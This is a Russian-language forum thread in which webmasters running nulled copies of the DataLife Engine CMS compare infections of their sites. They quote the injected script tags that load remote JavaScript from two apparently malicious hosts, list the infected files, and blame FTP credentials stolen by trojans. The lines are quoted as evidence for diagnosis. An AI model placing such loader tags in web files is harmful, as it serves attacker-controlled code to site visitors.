Уязвимости в DLE (продолжение)

[asmakovec2]

Вот сегодня появилась такая херня в движке на одном из сайтов во всех .JS файлах

Код: [Выделить]

<s'+'cript type="text/javascript" src="http://hosotpoyu.creditcybrary.com:8080/Illegal_Operation.js"></scr'+'ipt>

Проверяйте свои движки, а точнее .JS файлы

-----------------------------------------------------------------------
Лион зачем прошлую тему закрыл? Нормальная тема была, флуд можно и поудолять, тему то зачем сразу закрывать?

[ATOM]

Вот сегодня появилась такая херня в движке на одном из сайтов во всех .JS файлах

Код: [Выделить]

<s'+'cript type="text/javascript" src="http://hosotpoyu.creditcybrary.com:8080/Illegal_Operation.js"></scr'+'ipt>

Проверяйте свои движки, а точнее .JS файлы

-----------------------------------------------------------------------
Лион зачем прошлую тему закрыл? Нормальная тема была, флуд можно и поудолять, тему то зачем сразу закрывать?

бля парни! такая же ересь! ЛИОН помогай плиз) если нужны деньги пох скинемся. Помоги залать ВСЕ! дыры
в index.php в самом низу какая то ересь, потом в editor в папке там js файлы зараженны  classes короче ппц.

[chak]

У вас нуллы?


У меня все хорошо.... 

[asmakovec2]

Вот такие файлы повреждены

\backup\index.html

\engine\ajax\bbcodes.js

\engine\ajax\dle_ajax.js

\engine\ajax\js_edit.js

\engine\ajax\menu.js

\engine\classes\highslide\highslide.js

\engine\classes\swfupload\fileprogress.js

\engine\classes\swfupload\handlers.js

\engine\classes\swfupload\swfupload.js

\engine\classes\swfupload\swfupload.queue.js

[asmakovec2]

У вас нуллы?


У меня все хорошо.... 

Нулы. У меня тоже на 3-х сайтах всё нормально, а вот на одном такая беда.

[ATOM]

У вас нуллы?


У меня все хорошо....  

Нулы. У меня тоже на 3-х сайтах всё нормально, а вот на одном такая беда.

у меня на хосте 10 сайтов, только 2 зараженно, только нуллами и владею, на лицензию денег жалко))

<script type="text/javascript" src="http://sogpaoiy.the-mlmpowercall.com/Debug.js"></script>
<!--7c273e6110c6c8e283d7cb5b7a3c5394-->

вот такая ересь. как бороться хз. эта фигня месяца 2 долбит
пароли щас от фтп сменил ну хз.

[chak]

А скачать лицуху и активировать религия не позволяет?

[ATOM]

А скачать лицуху и активировать религия не позволяет?

лицензия-тот же нулл только со снятием ограничений. Разве не так?

[asmakovec2]

А скачать лицуху и активировать религия не позволяет?

Да вот только собирался двиг обновить лицухой с заменой файла init.php с нула, да не успел Вот теперь сижу и думаю что делать или обновлятся или подождать вылезет этот скрипт ещё раз или нет. Или бекап сделать базы, Интересно могла эта хрень в базу залезть  

[ATOM]

А скачать лицуху и активировать религия не позволяет?

Да вот только собирался двиг обновить лицухой с заменой файла init.php с нула, да не успел Вот теперь сижу и думаю что делать или обновлятся или подождать вылезет этот скрипт ещё раз или нет. Или бекап сделать базы, Интересно могла эта хрень в базу залезть  

поверь мне, у меня уже эта фигня 4 раз. надо чтото делать.

p.s. гуглил вот и чё нарыл

Ну на DLE так быстро грешить не стоит, проверьте логи ftp доступа + сверте дату модификации файлов которые были покареженны, нетак давно (9.06) прокатилась новая волна троянов, с какой не только каспер а не один из протестированных мною 7ми антивирусов с новейшими бд не справился, т.к. это троян а не вирь )
Короче говоря на 99% вероятней то что Вам не ДЛЕ хакнули а фтп пароль ушел налево, кстати он будет каждый раз даже если пас смените будет сливать их "хозяину" когда Вы будете на фтп идти, в общем направления для поиска дал, по детальней расписывать некогда

ссылка _http://forum.4dle.ru/lofiversion/index.php/t9951.html

[asmakovec2]

А скачать лицуху и активировать религия не позволяет?

лицензия-тот же нулл только со снятием ограничений. Разве не так?

Не не так. Это демо версия с ограничениями с зашифрованным кодом.
Лицензионный двиг надо активировать ключам который покупаешь.
А нулл это взломанная версия лицензионного движка (как допустим крякнутые программы , игры и т.д)

Лицензия от нула отличается только одним файлом init.php
Но когда делают нул, то могут кроме копирайтов напихать всякой ерунды в код по всем файлам.

Я вот вчера на один сайт поставил лицензионный двиг и заменил файл init.php с нула. Пока всё работает, и копирайтов нету по всему движку типа DataLife Engine Nulled by M.I.D-Team

[asmakovec2]

А скачать лицуху и активировать религия не позволяет?

Да вот только собирался двиг обновить лицухой с заменой файла init.php с нула, да не успел Вот теперь сижу и думаю что делать или обновлятся или подождать вылезет этот скрипт ещё раз или нет. Или бекап сделать базы, Интересно могла эта хрень в базу залезть  

поверь мне, у меня уже эта фигня 4 раз. надо чтото делать.

p.s. гуглил вот и чё нарыл

Ну на DLE так быстро грешить не стоит, проверьте логи ftp доступа + сверте дату модификации файлов которые были покареженны, нетак давно (9.06) прокатилась новая волна троянов, с какой не только каспер а не один из протестированных мною 7ми антивирусов с новейшими бд не справился, т.к. это троян а не вирь )
Короче говоря на 99% вероятней то что Вам не ДЛЕ хакнули а фтп пароль ушел налево, кстати он будет каждый раз даже если пас смените будет сливать их "хозяину" когда Вы будете на фтп идти, в общем направления для поиска дал, по детальней расписывать некогда

ссылка _http://forum.4dle.ru/lofiversion/index.php/t9951.html

А дату видел этого поста 15.6.2009 это уже старая тема.

[ATOM]

да ппц, уже бесят эти дыры. Чё целка не может нормально сделать? Или специально так делает?

[asmakovec2]

да ппц, уже бесят эти дыры. Чё целка не может нормально сделать? Или специально так делает?

мало того что целка дыры оставляет так ещё и выё....  Вот сегодня наткнулся на такую статейку _http://savgroup.ru/others/76-dle-news-pravda-zhizni.html

[Lion__]

что? Я тут при чём?? Ограничение по ип на фтп кидай, это не нулл виноват и не дыра, а трояны на твоём компе